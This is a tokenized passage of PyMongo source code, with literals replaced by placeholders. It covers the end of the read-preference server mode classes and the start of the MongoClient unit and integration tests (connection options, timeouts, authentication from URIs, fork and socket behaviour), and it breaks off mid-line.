) <EOL> def __eq__ ( self , other ) : <EOL> if isinstance ( other , _ServerMode ) : <EOL> return ( self . mode == other . mode and <EOL> self . tag_sets == other . tag_sets ) <EOL> return NotImplemented <EOL> def __ne__ ( self , other ) : <EOL> return not self == other <EOL> def __getstate__ ( self ) : <EOL> """<STR_LIT>""" <EOL> return { '<STR_LIT>' : self . __mode , '<STR_LIT>' : self . __tag_sets } <EOL> def __setstate__ ( self , value ) : <EOL> """<STR_LIT>""" <EOL> self . __mode = value [ '<STR_LIT>' ] <EOL> self . __mongos_mode = _MONGOS_MODES [ self . __mode ] <EOL> self . __tag_sets = _validate_tag_sets ( value [ '<STR_LIT>' ] ) <EOL> class Primary ( _ServerMode ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self ) : <EOL> super ( Primary , self ) . __init__ ( _PRIMARY ) <EOL> def __call__ ( self , server_descriptions ) : <EOL> """<STR_LIT>""" <EOL> return writable_server_selector ( server_descriptions ) <EOL> def __repr__ ( self ) : <EOL> return "<STR_LIT>" <EOL> def __eq__ ( self , other ) : <EOL> if isinstance ( other , _ServerMode ) : <EOL> return other . mode == _PRIMARY <EOL> return NotImplemented <EOL> class PrimaryPreferred ( _ServerMode ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , tag_sets = None ) : <EOL> super ( PrimaryPreferred , self ) . __init__ ( _PRIMARY_PREFERRED , tag_sets ) <EOL> def __call__ ( self , server_descriptions ) : <EOL> """<STR_LIT>""" <EOL> writable_servers = writable_server_selector ( server_descriptions ) <EOL> if writable_servers : <EOL> return writable_servers <EOL> else : <EOL> return secondary_with_tags_server_selector ( <EOL> self . tag_sets , <EOL> server_descriptions ) <EOL> class Secondary ( _ServerMode ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , tag_sets = None ) : <EOL> super ( Secondary , self ) . __init__ ( _SECONDARY , tag_sets ) <EOL> def __call__ ( self , server_descriptions ) : <EOL> """<STR_LIT>""" <EOL> return secondary_with_tags_server_selector ( <EOL> self . tag_sets , <EOL> server_descriptions ) <EOL> class SecondaryPreferred ( _ServerMode ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , tag_sets = None ) : <EOL> super ( SecondaryPreferred , self ) . __init__ ( _SECONDARY_PREFERRED , tag_sets ) <EOL> def __call__ ( self , server_descriptions ) : <EOL> """<STR_LIT>""" <EOL> secondaries = secondary_with_tags_server_selector ( <EOL> self . tag_sets , <EOL> server_descriptions ) <EOL> if secondaries : <EOL> return secondaries <EOL> else : <EOL> return writable_server_selector ( server_descriptions ) <EOL> class Nearest ( _ServerMode ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , tag_sets = None ) : <EOL> super ( Nearest , self ) . __init__ ( _NEAREST , tag_sets ) <EOL> def __call__ ( self , server_descriptions ) : <EOL> """<STR_LIT>""" <EOL> return member_with_tags_server_selector ( <EOL> self . tag_sets or [ { } ] , <EOL> server_descriptions ) <EOL> _ALL_READ_PREFERENCES = ( Primary , PrimaryPreferred , <EOL> Secondary , SecondaryPreferred , Nearest ) <EOL> def make_read_preference ( mode , tag_sets ) : <EOL> if mode == _PRIMARY : <EOL> if tag_sets not in ( None , [ { } ] ) : <EOL> raise ConfigurationError ( "<STR_LIT>" <EOL> "<STR_LIT>" ) <EOL> return Primary ( ) <EOL> return _ALL_READ_PREFERENCES [ mode ] ( tag_sets ) <EOL> _MODES = ( <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> ) <EOL> class ReadPreference ( object ) : <EOL> """<STR_LIT>""" <EOL> PRIMARY = Primary ( ) <EOL> PRIMARY_PREFERRED = PrimaryPreferred ( ) <EOL> SECONDARY = Secondary ( ) <EOL> SECONDARY_PREFERRED = SecondaryPreferred ( ) <EOL> NEAREST = Nearest ( ) <EOL> def read_pref_mode_from_name ( name ) : <EOL> """<STR_LIT>""" <EOL> return _MONGOS_MODES . index ( name ) <EOL> class MovingAverage ( object ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self ) : <EOL> self . average = None <EOL> def add_sample ( self , sample ) : <EOL> if sample < <NUM_LIT:0> : <EOL> return <EOL> if self . average is None : <EOL> self . average = sample <EOL> else : <EOL> self . average = <NUM_LIT> * self . average + <NUM_LIT> * sample <EOL> def get ( self ) : <EOL> """<STR_LIT>""" <EOL> return self . average <EOL> def reset ( self ) : <EOL> self . average = None </s>
<s> """<STR_LIT>""" <EOL> import contextlib <EOL> import datetime <EOL> import os <EOL> import socket <EOL> import struct <EOL> import sys <EOL> import time <EOL> import traceback <EOL> import warnings <EOL> sys . path [ <NUM_LIT:0> : <NUM_LIT:0> ] = [ "<STR_LIT>" ] <EOL> from bson import BSON <EOL> from bson . codec_options import CodecOptions <EOL> from bson . py3compat import thread , u <EOL> from bson . son import SON <EOL> from bson . tz_util import utc <EOL> from pymongo import auth , message <EOL> from pymongo . cursor import CursorType <EOL> from pymongo . database import Database <EOL> from pymongo . errors import ( AutoReconnect , <EOL> ConfigurationError , <EOL> ConnectionFailure , <EOL> InvalidName , <EOL> OperationFailure , <EOL> CursorNotFound , <EOL> NetworkTimeout , <EOL> InvalidURI ) <EOL> from pymongo . message import _CursorAddress <EOL> from pymongo . mongo_client import MongoClient <EOL> from pymongo . pool import SocketInfo <EOL> from pymongo . read_preferences import ReadPreference <EOL> from pymongo . server_selectors import ( any_server_selector , <EOL> writable_server_selector ) <EOL> from pymongo . server_type import SERVER_TYPE <EOL> from pymongo . write_concern import WriteConcern <EOL> from test import ( client_context , <EOL> client_knobs , <EOL> host , <EOL> pair , <EOL> port , <EOL> SkipTest , <EOL> unittest , <EOL> IntegrationTest , <EOL> db_pwd , <EOL> db_user , <EOL> MockClientTest ) <EOL> from test . pymongo_mocks import MockClient <EOL> from test . utils import ( assertRaisesExactly , <EOL> delay , <EOL> remove_all_users , <EOL> server_is_master_with_slave , <EOL> get_pool , <EOL> one , <EOL> connected , <EOL> wait_until , <EOL> rs_or_single_client , <EOL> rs_or_single_client_noauth , <EOL> lazy_client_trial , <EOL> NTHREADS ) <EOL> class ClientUnitTest ( unittest . TestCase ) : <EOL> """<STR_LIT>""" <EOL> @ classmethod <EOL> def setUpClass ( cls ) : <EOL> cls . client = MongoClient ( host , port , connect = False , <EOL> serverSelectionTimeoutMS = <NUM_LIT:100> ) <EOL> def test_keyword_arg_defaults ( self ) : <EOL> client = MongoClient ( socketTimeoutMS = None , <EOL> connectTimeoutMS = <NUM_LIT> , <EOL> waitQueueTimeoutMS = None , <EOL> waitQueueMultiple = None , <EOL> socketKeepAlive = False , <EOL> replicaSet = None , <EOL> read_preference = ReadPreference . PRIMARY , <EOL> ssl = False , <EOL> ssl_keyfile = None , <EOL> ssl_certfile = None , <EOL> ssl_cert_reqs = <NUM_LIT:0> , <EOL> ssl_ca_certs = None , <EOL> connect = False , <EOL> serverSelectionTimeoutMS = <NUM_LIT> ) <EOL> options = client . _MongoClient__options <EOL> pool_opts = options . pool_options <EOL> self . assertEqual ( None , pool_opts . socket_timeout ) <EOL> self . assertEqual ( <NUM_LIT> , pool_opts . connect_timeout ) <EOL> self . assertEqual ( None , pool_opts . wait_queue_timeout ) <EOL> self . assertEqual ( None , pool_opts . wait_queue_multiple ) <EOL> self . assertFalse ( pool_opts . socket_keepalive ) <EOL> self . assertEqual ( None , pool_opts . ssl_context ) <EOL> self . assertEqual ( None , options . replica_set_name ) <EOL> self . assertEqual ( ReadPreference . PRIMARY , client . read_preference ) <EOL> self . assertAlmostEqual ( <NUM_LIT:12> , client . server_selection_timeout ) <EOL> def test_types ( self ) : <EOL> self . assertRaises ( TypeError , MongoClient , <NUM_LIT:1> ) <EOL> self . assertRaises ( TypeError , MongoClient , <NUM_LIT> ) <EOL> self . assertRaises ( TypeError , MongoClient , "<STR_LIT:localhost>" , "<STR_LIT>" ) <EOL> self . assertRaises ( TypeError , MongoClient , "<STR_LIT:localhost>" , <NUM_LIT> ) <EOL> self . assertRaises ( TypeError , MongoClient , "<STR_LIT:localhost>" , [ ] ) <EOL> self . assertRaises ( ConfigurationError , MongoClient , [ ] ) <EOL> def test_max_pool_size_zero ( self ) : <EOL> with self . assertRaises ( ValueError ) : <EOL> MongoClient ( maxPoolSize = <NUM_LIT:0> ) <EOL> def test_get_db ( self ) : <EOL> def make_db ( base , name ) : <EOL> return base [ name ] <EOL> self . assertRaises ( InvalidName , make_db , self . client , "<STR_LIT>" ) <EOL> self . assertRaises ( InvalidName , make_db , self . client , "<STR_LIT>" ) <EOL> self . assertRaises ( InvalidName , make_db , self . client , "<STR_LIT>" ) <EOL> self . assertRaises ( InvalidName , make_db , self . client , "<STR_LIT>" ) <EOL> self . assertRaises ( InvalidName , make_db , self . client , "<STR_LIT>" ) <EOL> self . assertRaises ( InvalidName , make_db , self . client , "<STR_LIT>" ) <EOL> self . assertTrue ( isinstance ( self . client . test , Database ) ) <EOL> self . assertEqual ( self . client . test , self . client [ "<STR_LIT:test>" ] ) <EOL> self . assertEqual ( self . client . test , Database ( self . client , "<STR_LIT:test>" ) ) <EOL> def test_get_database ( self ) : <EOL> codec_options = CodecOptions ( tz_aware = True ) <EOL> write_concern = WriteConcern ( w = <NUM_LIT:2> , j = True ) <EOL> db = self . client . get_database ( <EOL> '<STR_LIT:foo>' , codec_options , ReadPreference . SECONDARY , write_concern ) <EOL> self . assertEqual ( '<STR_LIT:foo>' , db . name ) <EOL> self . assertEqual ( codec_options , db . codec_options ) <EOL> self . assertEqual ( ReadPreference . SECONDARY , db . read_preference ) <EOL> self . assertEqual ( write_concern , db . write_concern ) <EOL> def test_getattr ( self ) : <EOL> self . assertTrue ( isinstance ( self . client [ '<STR_LIT>' ] , Database ) ) <EOL> with self . assertRaises ( AttributeError ) as context : <EOL> self . client . _does_not_exist <EOL> self . assertIn ( "<STR_LIT>" , <EOL> str ( context . exception ) ) <EOL> def test_iteration ( self ) : <EOL> def iterate ( ) : <EOL> [ a for a in self . client ] <EOL> self . assertRaises ( TypeError , iterate ) <EOL> def test_get_default_database ( self ) : <EOL> c = MongoClient ( "<STR_LIT>" % ( host , port ) , connect = False ) <EOL> self . assertEqual ( Database ( c , '<STR_LIT:foo>' ) , c . get_default_database ( ) ) <EOL> def test_get_default_database_error ( self ) : <EOL> c = MongoClient ( "<STR_LIT>" % ( host , port ) , connect = False ) <EOL> self . assertRaises ( ConfigurationError , c . get_default_database ) <EOL> def test_get_default_database_with_authsource ( self ) : <EOL> uri = "<STR_LIT>" % ( host , port ) <EOL> c = MongoClient ( uri , connect = False ) <EOL> self . assertEqual ( Database ( c , '<STR_LIT:foo>' ) , c . get_default_database ( ) ) <EOL> class TestClient ( IntegrationTest ) : <EOL> def test_constants ( self ) : <EOL> MongoClient . HOST = "<STR_LIT>" <EOL> MongoClient . PORT = <NUM_LIT> <EOL> with self . assertRaises ( AutoReconnect ) : <EOL> connected ( MongoClient ( serverSelectionTimeoutMS = <NUM_LIT:10> ) ) <EOL> connected ( MongoClient ( host , port ) ) <EOL> MongoClient . HOST = host <EOL> MongoClient . PORT = port <EOL> connected ( MongoClient ( ) ) <EOL> def test_init_disconnected ( self ) : <EOL> c = rs_or_single_client ( connect = False ) <EOL> self . assertIsInstance ( c . is_primary , bool ) <EOL> c = rs_or_single_client ( connect = False ) <EOL> self . assertIsInstance ( c . is_mongos , bool ) <EOL> c = rs_or_single_client ( connect = False ) <EOL> self . assertIsInstance ( c . max_pool_size , int ) <EOL> self . assertIsInstance ( c . nodes , frozenset ) <EOL> c = rs_or_single_client ( connect = False ) <EOL> self . assertEqual ( c . codec_options , CodecOptions ( ) ) <EOL> self . assertIsInstance ( c . max_bson_size , int ) <EOL> c = rs_or_single_client ( connect = False ) <EOL> self . assertFalse ( c . primary ) <EOL> self . assertFalse ( c . secondaries ) <EOL> c = rs_or_single_client ( connect = False ) <EOL> self . assertIsInstance ( c . max_write_batch_size , int ) <EOL> if client_context . is_rs : <EOL> self . assertIsNotNone ( c . address ) <EOL> else : <EOL> self . assertEqual ( c . address , ( host , port ) ) <EOL> bad_host = "<STR_LIT>" <EOL> c = MongoClient ( bad_host , port , connectTimeoutMS = <NUM_LIT:1> , <EOL> serverSelectionTimeoutMS = <NUM_LIT:10> ) <EOL> self . assertRaises ( ConnectionFailure , c . pymongo_test . test . find_one ) <EOL> def test_init_disconnected_with_auth ( self ) : <EOL> uri = "<STR_LIT>" <EOL> c = MongoClient ( uri , connectTimeoutMS = <NUM_LIT:1> , <EOL> serverSelectionTimeoutMS = <NUM_LIT:10> ) <EOL> self . assertRaises ( ConnectionFailure , c . pymongo_test . test . find_one ) <EOL> def test_equality ( self ) : <EOL> c = connected ( rs_or_single_client ( ) ) <EOL> self . assertEqual ( client_context . rs_or_standalone_client , c ) <EOL> self . assertFalse ( client_context . rs_or_standalone_client != c ) <EOL> def test_host_w_port ( self ) : <EOL> with self . assertRaises ( ValueError ) : <EOL> connected ( MongoClient ( "<STR_LIT>" % host , connectTimeoutMS = <NUM_LIT:1> , <EOL> serverSelectionTimeoutMS = <NUM_LIT:10> ) ) <EOL> def test_repr ( self ) : <EOL> import bson <EOL> client = MongoClient ( <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' , <EOL> connect = False , document_class = SON ) <EOL> the_repr = repr ( client ) <EOL> self . assertIn ( '<STR_LIT>' , the_repr ) <EOL> self . assertIn ( <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" , <EOL> the_repr ) <EOL> self . assertIn ( "<STR_LIT>" , the_repr ) <EOL> self . assertIn ( "<STR_LIT>" , the_repr ) <EOL> self . assertEqual ( eval ( the_repr ) , client ) <EOL> @ client_context . require_replica_set <EOL> def test_repr_replica_set ( self ) : <EOL> self . assertIn ( "<STR_LIT>" , repr ( self . client ) ) <EOL> self . assertIn ( pair , repr ( self . client ) ) <EOL> def test_getters ( self ) : <EOL> self . assertEqual ( client_context . client . address , ( host , port ) ) <EOL> self . assertEqual ( client_context . nodes , self . client . nodes ) <EOL> def test_database_names ( self ) : <EOL> self . client . pymongo_test . test . insert_one ( { "<STR_LIT>" : u ( "<STR_LIT:object>" ) } ) <EOL> self . client . pymongo_test_mike . test . insert_one ( { "<STR_LIT>" : u ( "<STR_LIT:object>" ) } ) <EOL> dbs = self . client . database_names ( ) <EOL> self . assertTrue ( "<STR_LIT>" in dbs ) <EOL> self . assertTrue ( "<STR_LIT>" in dbs ) <EOL> def test_drop_database ( self ) : <EOL> self . assertRaises ( TypeError , self . client . drop_database , <NUM_LIT:5> ) <EOL> self . assertRaises ( TypeError , self . client . drop_database , None ) <EOL> self . client . pymongo_test . test . insert_one ( { "<STR_LIT>" : u ( "<STR_LIT:object>" ) } ) <EOL> self . client . pymongo_test2 . test . insert_one ( { "<STR_LIT>" : u ( "<STR_LIT:object>" ) } ) <EOL> dbs = self . client . database_names ( ) <EOL> self . assertIn ( "<STR_LIT>" , dbs ) <EOL> self . assertIn ( "<STR_LIT>" , dbs ) <EOL> self . client . drop_database ( "<STR_LIT>" ) <EOL> self . client . drop_database ( self . client . pymongo_test2 ) <EOL> raise SkipTest ( "<STR_LIT>" ) <EOL> dbs = self . client . database_names ( ) <EOL> self . assertNotIn ( "<STR_LIT>" , dbs ) <EOL> self . assertNotIn ( "<STR_LIT>" , dbs ) <EOL> def test_close ( self ) : <EOL> coll = self . client . pymongo_test . bar <EOL> self . client . close ( ) <EOL> self . client . close ( ) <EOL> coll . count ( ) <EOL> self . client . close ( ) <EOL> self . client . close ( ) <EOL> coll . count ( ) <EOL> def test_bad_uri ( self ) : <EOL> with self . assertRaises ( InvalidURI ) : <EOL> MongoClient ( "<STR_LIT>" ) <EOL> @ client_context . require_auth <EOL> def test_auth_from_uri ( self ) : <EOL> self . client . admin . add_user ( "<STR_LIT>" , "<STR_LIT>" , roles = [ "<STR_LIT:root>" ] ) <EOL> self . addCleanup ( self . client . admin . remove_user , '<STR_LIT>' ) <EOL> self . addCleanup ( remove_all_users , self . client . pymongo_test ) <EOL> self . client . pymongo_test . add_user ( <EOL> "<STR_LIT:user>" , "<STR_LIT>" , roles = [ '<STR_LIT>' , '<STR_LIT>' ] ) <EOL> with self . assertRaises ( OperationFailure ) : <EOL> connected ( rs_or_single_client ( <EOL> "<STR_LIT>" % ( host , port ) ) ) <EOL> connected ( rs_or_single_client_noauth ( <EOL> "<STR_LIT>" % ( host , port ) ) ) <EOL> uri = "<STR_LIT>" % ( host , port ) <EOL> with self . assertRaises ( OperationFailure ) : <EOL> connected ( rs_or_single_client ( uri ) ) <EOL> connected ( rs_or_single_client_noauth ( <EOL> "<STR_LIT>" % ( host , port ) ) ) <EOL> rs_or_single_client ( <EOL> "<STR_LIT>" % ( host , port ) , <EOL> connect = False ) . pymongo_test . test . find_one ( ) <EOL> bad_client = rs_or_single_client ( <EOL> "<STR_LIT>" % ( host , port ) , <EOL> connect = False ) <EOL> self . assertRaises ( OperationFailure , <EOL> bad_client . pymongo_test . test . find_one ) <EOL> @ client_context . require_auth <EOL> def test_multiple_logins ( self ) : <EOL> self . client . pymongo_test . add_user ( '<STR_LIT>' , '<STR_LIT>' , roles = [ '<STR_LIT>' ] ) <EOL> self . client . pymongo_test . add_user ( '<STR_LIT>' , '<STR_LIT>' , roles = [ '<STR_LIT>' ] ) <EOL> self . addCleanup ( remove_all_users , self . client . pymongo_test ) <EOL> client = rs_or_single_client_noauth ( <EOL> "<STR_LIT>" % ( host , port ) ) <EOL> client . pymongo_test . test . find_one ( ) <EOL> with self . assertRaises ( OperationFailure ) : <EOL> client . pymongo_test . authenticate ( '<STR_LIT>' , '<STR_LIT>' ) <EOL> client . pymongo_test . test . find_one ( ) <EOL> client . pymongo_test . logout ( ) <EOL> with self . assertRaises ( OperationFailure ) : <EOL> client . pymongo_test . test . find_one ( ) <EOL> client . pymongo_test . authenticate ( '<STR_LIT>' , '<STR_LIT>' ) <EOL> client . pymongo_test . test . find_one ( ) <EOL> with self . assertRaises ( OperationFailure ) : <EOL> client . pymongo_test . authenticate ( '<STR_LIT>' , '<STR_LIT>' ) <EOL> client . pymongo_test . test . find_one ( ) <EOL> @ client_context . require_auth <EOL> def test_lazy_auth_raises_operation_failure ( self ) : <EOL> lazy_client = rs_or_single_client ( <EOL> "<STR_LIT>" % host , connect = False ) <EOL> assertRaisesExactly ( <EOL> OperationFailure , lazy_client . test . collection . find_one ) <EOL> def test_unix_socket ( self ) : <EOL> if not hasattr ( socket , "<STR_LIT>" ) : <EOL> raise SkipTest ( "<STR_LIT>" ) <EOL> mongodb_socket = '<STR_LIT>' <EOL> encoded_socket = '<STR_LIT>' <EOL> if not os . access ( mongodb_socket , os . R_OK ) : <EOL> raise SkipTest ( "<STR_LIT>" ) <EOL> if client_context . auth_enabled : <EOL> uri = "<STR_LIT>" % ( db_user , db_pwd , encoded_socket ) <EOL> else : <EOL> uri = "<STR_LIT>" % encoded_socket <EOL> client = MongoClient ( uri ) <EOL> client . pymongo_test . test . insert_one ( { "<STR_LIT>" : "<STR_LIT:object>" } ) <EOL> dbs = client . database_names ( ) <EOL> self . assertTrue ( "<STR_LIT>" in dbs ) <EOL> self . assertRaises ( <EOL> ConnectionFailure , <EOL> connected , MongoClient ( "<STR_LIT>" , <EOL> serverSelectionTimeoutMS = <NUM_LIT:100> ) ) <EOL> def test_fork ( self ) : <EOL> if sys . platform == "<STR_LIT:win32>" : <EOL> raise SkipTest ( "<STR_LIT>" ) <EOL> try : <EOL> import multiprocessing <EOL> except ImportError : <EOL> raise SkipTest ( "<STR_LIT>" ) <EOL> db = self . client . pymongo_test <EOL> db . test . find_one ( ) <EOL> def f ( pipe ) : <EOL> try : <EOL> kill_cursors_executor = self . client . _kill_cursors_executor <EOL> servers = self . client . _topology . select_servers ( <EOL> any_server_selector ) <EOL> db . test . find_one ( ) <EOL> wait_until ( <EOL> lambda : all ( s . _monitor . _executor . _thread . is_alive ( ) <EOL> for s in servers ) , <EOL> "<STR_LIT>" ) <EOL> wait_until ( lambda : kill_cursors_executor . _thread . is_alive ( ) , <EOL> "<STR_LIT>" ) <EOL> except : <EOL> traceback . print_exc ( ) <EOL> pipe . send ( True ) <EOL> parent_pipe , child_pipe = multiprocessing . Pipe ( ) <EOL> p = multiprocessing . Process ( target = f , args = ( child_pipe , ) ) <EOL> p . start ( ) <EOL> p . join ( <NUM_LIT:10> ) <EOL> child_pipe . close ( ) <EOL> try : <EOL> parent_pipe . recv ( ) <EOL> self . fail ( ) <EOL> except EOFError : <EOL> pass <EOL> def test_document_class ( self ) : <EOL> c = self . client <EOL> db = c . pymongo_test <EOL> db . test . insert_one ( { "<STR_LIT:x>" : <NUM_LIT:1> } ) <EOL> self . assertEqual ( dict , c . codec_options . document_class ) <EOL> self . assertTrue ( isinstance ( db . test . find_one ( ) , dict ) ) <EOL> self . assertFalse ( isinstance ( db . test . find_one ( ) , SON ) ) <EOL> c = rs_or_single_client ( document_class = SON ) <EOL> db = c . pymongo_test <EOL> self . assertEqual ( SON , c . codec_options . document_class ) <EOL> self . assertTrue ( isinstance ( db . test . find_one ( ) , SON ) ) <EOL> def test_timeouts ( self ) : <EOL> client = rs_or_single_client ( connectTimeoutMS = <NUM_LIT> ) <EOL> self . assertEqual ( <NUM_LIT> , get_pool ( client ) . opts . connect_timeout ) <EOL> client = rs_or_single_client ( socketTimeoutMS = <NUM_LIT> ) <EOL> self . assertEqual ( <NUM_LIT> , get_pool ( client ) . opts . socket_timeout ) <EOL> def test_socket_timeout_ms_validation ( self ) : <EOL> c = rs_or_single_client ( socketTimeoutMS = <NUM_LIT:10> * <NUM_LIT:1000> ) <EOL> self . assertEqual ( <NUM_LIT:10> , get_pool ( c ) . opts . socket_timeout ) <EOL> c = connected ( rs_or_single_client ( socketTimeoutMS = None ) ) <EOL> self . assertEqual ( None , get_pool ( c ) . opts . socket_timeout ) <EOL> self . assertRaises ( ValueError , <EOL> rs_or_single_client , socketTimeoutMS = <NUM_LIT:0> ) <EOL> self . assertRaises ( ValueError , <EOL> rs_or_single_client , socketTimeoutMS = - <NUM_LIT:1> ) <EOL> self . assertRaises ( ValueError , <EOL> rs_or_single_client , socketTimeoutMS = <NUM_LIT> ) <EOL> self . assertRaises ( ValueError , <EOL> rs_or_single_client , socketTimeoutMS = '<STR_LIT:foo>' ) <EOL> def test_socket_timeout ( self ) : <EOL> no_timeout = self . client <EOL> timeout_sec = <NUM_LIT:1> <EOL> timeout = rs_or_single_client ( socketTimeoutMS = <NUM_LIT:1000> * timeout_sec ) <EOL> no_timeout . pymongo_test . drop_collection ( "<STR_LIT:test>" ) <EOL> no_timeout . pymongo_test . test . insert_one ( { "<STR_LIT:x>" : <NUM_LIT:1> } ) <EOL> where_func = delay ( timeout_sec + <NUM_LIT:1> ) <EOL> def get_x ( db ) : <EOL> doc = next ( db . test . find ( ) . where ( where_func ) ) <EOL> return doc [ "<STR_LIT:x>" ] <EOL> self . assertEqual ( <NUM_LIT:1> , get_x ( no_timeout . pymongo_test ) ) <EOL> self . assertRaises ( NetworkTimeout , get_x , timeout . pymongo_test ) <EOL> def test_server_selection_timeout ( self ) : <EOL> client = MongoClient ( serverSelectionTimeoutMS = <NUM_LIT:100> , connect = False ) <EOL> self . assertAlmostEqual ( <NUM_LIT:0.1> , client . server_selection_timeout ) <EOL> client = MongoClient ( serverSelectionTimeoutMS = <NUM_LIT:0> , connect = False ) <EOL> self . assertAlmostEqual ( <NUM_LIT:0> , client . server_selection_timeout ) <EOL> self . assertRaises ( ValueError , MongoClient , <EOL> serverSelectionTimeoutMS = "<STR_LIT:foo>" , connect = False ) <EOL> self . assertRaises ( ValueError , MongoClient , <EOL> serverSelectionTimeoutMS = - <NUM_LIT:1> , connect = False ) <EOL> self . assertRaises ( ConfigurationError , MongoClient , <EOL> serverSelectionTimeoutMS = None , connect = False ) <EOL> client = MongoClient ( <EOL> '<STR_LIT>' , connect = False ) <EOL> self . assertAlmostEqual ( <NUM_LIT:0.1> , client . server_selection_timeout ) <EOL> client = MongoClient ( <EOL> '<STR_LIT>' , connect = False ) <EOL> self . assertAlmostEqual ( <NUM_LIT:0> , client . server_selection_timeout ) <EOL> client = MongoClient ( <EOL> '<STR_LIT>' , connect = False ) <EOL> self . assertAlmostEqual ( <NUM_LIT:30> , client . server_selection_timeout ) <EOL> client = MongoClient ( <EOL> '<STR_LIT>' , connect = False ) <EOL> self . assertAlmostEqual ( <NUM_LIT:30> , client . server_selection_timeout ) <EOL> def test_waitQueueTimeoutMS ( self ) : <EOL> client = rs_or_single_client ( waitQueueTimeoutMS = <NUM_LIT> ) <EOL> self . assertEqual ( get_pool ( client ) . opts . wait_queue_timeout , <NUM_LIT:2> ) <EOL> def test_waitQueueMultiple ( self ) : <EOL> client = rs_or_single_client ( maxPoolSize = <NUM_LIT:3> , waitQueueMultiple = <NUM_LIT:2> ) <EOL> pool = get_pool ( client ) <EOL> self . assertEqual ( pool . opts . wait_queue_multiple , <NUM_LIT:2> ) <EOL> self . assertEqual ( pool . _socket_semaphore . waiter_semaphore . counter , <NUM_LIT:6> ) <EOL> def test_socketKeepAlive ( self ) : <EOL> client = rs_or_single_client ( socketKeepAlive = True ) <EOL> self . assertTrue ( get_pool ( client ) . opts . socket_keepalive ) <EOL> def test_tz_aware ( self ) : <EOL> self . assertRaises ( ValueError , MongoClient , tz_aware = '<STR_LIT:foo>' ) <EOL> aware = rs_or_single_client ( tz_aware = True ) <EOL> naive = self . client <EOL> aware . pymongo_test . drop_collection ( "<STR_LIT:test>" ) <EOL> now = datetime . datetime . utcnow ( ) <EOL> aware . pymongo_test . test . insert_one ( { "<STR_LIT:x>" : now } ) <EOL> self . assertEqual ( None , naive . pymongo_test . test . find_one ( ) [ "<STR_LIT:x>" ] . tzinfo ) <EOL> self . assertEqual ( utc , aware . pymongo_test . test . find_one ( ) [ "<STR_LIT:x>" ] . tzinfo ) <EOL> self . assertEqual ( <EOL> aware . pymongo_test . test . find_one ( ) [ "<STR_LIT:x>" ] . replace ( tzinfo = None ) , <EOL> naive . pymongo_test . test . find_one ( ) [ "<STR_LIT:x>" ] ) <EOL> @ client_context . require_ipv6 <EOL> def test_ipv6 ( self ) : <EOL> if client_context . auth_enabled : <EOL> auth_str = "<STR_LIT>" % ( db_user , db_pwd ) <EOL> else : <EOL> auth_str = "<STR_LIT>" <EOL> uri = "<STR_LIT>" % ( auth_str , port ) <EOL> if client_context . is_rs : <EOL> uri += '<STR_LIT>' + client_context . replica_set_name <EOL> client = rs_or_single_client_noauth ( uri ) <EOL> client . pymongo_test . test . insert_one ( { "<STR_LIT>" : u ( "<STR_LIT:object>" ) } ) <EOL> client . pymongo_test_bernie . test . insert_one ( { "<STR_LIT>" : u ( "<STR_LIT:object>" ) } ) <EOL> dbs = client . database_names ( ) <EOL> self . assertTrue ( "<STR_LIT>" in dbs ) <EOL> self . assertTrue ( "<STR_LIT>" in dbs ) <EOL> @ client_context . require_no_mongos <EOL> def test_fsync_lock_unlock ( self ) : <EOL> if ( server_is_master_with_slave ( client_context . client ) and <EOL> client_context . version . at_least ( <NUM_LIT:2> , <NUM_LIT:3> , <NUM_LIT:0> ) ) : <EOL> raise SkipTest ( '<STR_LIT>' ) <EOL> self . assertFalse ( self . client . is_locked ) <EOL> if sys . platform not in ( '<STR_LIT>' , '<STR_LIT:win32>' ) : <EOL> self . client . fsync ( async = True ) <EOL> self . assertFalse ( self . client . is_locked ) <EOL> self . client . fsync ( lock = True ) <EOL> self . assertTrue ( self . client . is_locked ) <EOL> locked = True <EOL> self . client . unlock ( ) <EOL> for _ in range ( <NUM_LIT:5> ) : <EOL> locked = self . client . is_locked <EOL> if not locked : <EOL> break <EOL> time . sleep ( <NUM_LIT:1> ) <EOL> self . assertFalse ( locked ) <EOL> def test_contextlib ( self ) : <EOL> client = rs_or_single_client ( ) <EOL> client . pymongo_test . drop_collection ( "<STR_LIT:test>" ) <EOL> client . pymongo_test . test . insert_one ( { "<STR_LIT:foo>" : "<STR_LIT:bar>" } ) <EOL> self . assertEqual ( <NUM_LIT:1> , len ( get_pool ( client ) . sockets ) ) <EOL> with contextlib . closing ( client ) : <EOL> self . assertEqual ( "<STR_LIT:bar>" , client . pymongo_test . test . find_one ( ) [ "<STR_LIT:foo>" ] ) <EOL> self . assertEqual ( <NUM_LIT:1> , len ( get_pool ( client ) . sockets ) ) <EOL> self . assertEqual ( <NUM_LIT:0> , len ( get_pool ( client ) . sockets ) ) <EOL> with client as client : <EOL> self . assertEqual ( "<STR_LIT:bar>" , client . pymongo_test . test . find_one ( ) [ "<STR_LIT:foo>" ] ) <EOL> self . assertEqual ( <NUM_LIT:0> , len ( get_pool ( client ) . sockets ) ) <EOL> def test_interrupt_signal ( self ) : <EOL> if sys . platform . startswith ( '<STR_LIT>' ) : <EOL> raise SkipTest ( "<STR_LIT>" ) <EOL> db = self . client . pymongo_test <EOL> where = delay ( <NUM_LIT> ) <EOL> db . drop_collection ( '<STR_LIT:foo>' ) <EOL> db . foo . insert_one ( { '<STR_LIT>' : <NUM_LIT:1> } ) <EOL> def interrupter ( ) : <EOL> time . sleep ( <NUM_LIT> ) <EOL> thread . interrupt_main ( ) <EOL> thread . start_new_thread ( interrupter , ( ) ) <EOL> raised = False <EOL> try : <EOL> next ( db . foo . find ( { '<STR_LIT>' : where } ) ) <EOL> except KeyboardInterrupt : <EOL> raised = True <EOL> self . assertTrue ( raised , "<STR_LIT>" ) <EOL> self . assertEqual ( <EOL> { '<STR_LIT>' : <NUM_LIT:1> } , <EOL> next ( db . foo . find ( ) ) <EOL> ) <EOL> def test_operation_failure ( self ) : <EOL> pool = get_pool ( self . client ) <EOL> socket_count = len ( pool . sockets 